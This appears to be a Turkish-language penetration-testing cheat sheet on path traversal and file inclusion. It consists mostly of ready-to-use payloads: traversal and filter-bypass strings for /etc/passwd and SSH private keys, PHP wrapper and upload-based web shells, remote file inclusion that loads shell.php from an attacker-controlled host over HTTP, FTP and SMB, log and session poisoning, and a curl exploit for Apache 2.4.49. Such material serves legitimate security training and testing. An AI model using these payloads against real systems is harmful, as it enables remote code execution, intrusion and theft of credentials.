Path Traversal Nedir?
Path Traversal veya Directory Traversal, saldırganın bir uygulamayı çalıştıran sunucudaki herhangi bir dosyayı okumasını sağlar. Bu dosyalar uygulama kodu ve verileri, backend sistemler için kimlik bilgileri veya hassas işletim sistemi dosyaları olabilir.
Bazı durumlarda, saldırgan sunucudaki herhangi bir dosyanın üzerine yazarak uygulama verilerini veya davranışını değiştirebilir ve nihayetinde sunucunun tam kontrolünü ele geçirebilir.
Yöntemler
Full Path
Copy /etc/passwd
C:/windows/system32/drivers/etc/hosts Dizin Değiştirerek
Copy ../../../../../etc/passwd
../../../../../windows/system32/drivers/etc/hosts Korumayı Atlatma
Copy ....//....//....//etc/passwd
....//....//....//windows/system32/drivers/etc/hosts URL Encoding
Copy ..%252f..%252f..%252fetc/passwd
..%252f..%252f..%252fwindows/system32/drivers/etc/hosts Dizin Kontrolünü Atlatma
Copy /var/www/images/../../../etc/passwd
C:/inetpub/wwwroot/images/../../../../../windows/system32/drivers/etc/hosts Eklenti Korumasını atlatma
Copy ../../../etc/passwd%00.png
../../../../../windows/system32/drivers/etc/hosts%00.png PHP Wrappers
Copy http://example.com?page=php://filter/convert.base64-encode/resource=/etc/passwd
http://example.com?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
http://example.com?page=php://input&cmd=id # POST data <?php system($_GET["cmd"]); ?>
http://example.com?page=expect://id RFI
Copy echo '<?php system($_GET["cmd"]); ?>' > shell.php
python -m http.server 80
http://example.com?page=http://192.168.1.2/shell.php&cmd=ls
python -m pyftpdlib -p 21
http://example.com?page=ftp://192.168.1.2/shell.php&cmd=id
impacket-smbserver -smb2support share .
http://example.com?page=\\192.168.1.2\share\shell.php&cmd=whoami Gif Upload LFI
Copy echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
http://example.com?page=./profile_images/shell.gif&cmd=id Zip Upload LFI
Copy echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
http://example.com?page=zip://./profile_images/shell.jpg%23shell.php&cmd=id Phar Upload
Copy <?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
Copy php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
http://example.com?page=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id PHP Log Poisoning
Copy
# PHP Session Poisoning
http://example.com?page=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
http://example.com?page=C:\Windows\Temp\sess_nhhv8i0o6ua4g88bkdl9u1fdsd
http://example.com?page=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
http://example.com?page=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# PHP Log Poisoning
http://example.com?page=/var/log/apache2/access.log
http://example.com?page=/var/log/nginx/access.log
http://example.com?page=C:\nginx\log\access.log
http://example.com?page=C:\xampp\apache\logs\access.log
User Agent: <?php system($_GET['cmd']); ?>
http://example.com?page=/var/log/apache2/access.log?cmd=id LFI Wordlists
Linux: https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
Win: https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows
Apache HTTP Server 2.4.49
Copy curl -s --path-as-is "http://192.168.199.245/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
/etc/passwd
/root/.ssh/id_rsa
/root/.ssh/id_ecdsa Araçlar
Burp Suite Active Scan
Kaynaklar
Portswigger Academy: https://portswigger.net/web-security/file-path-traversal
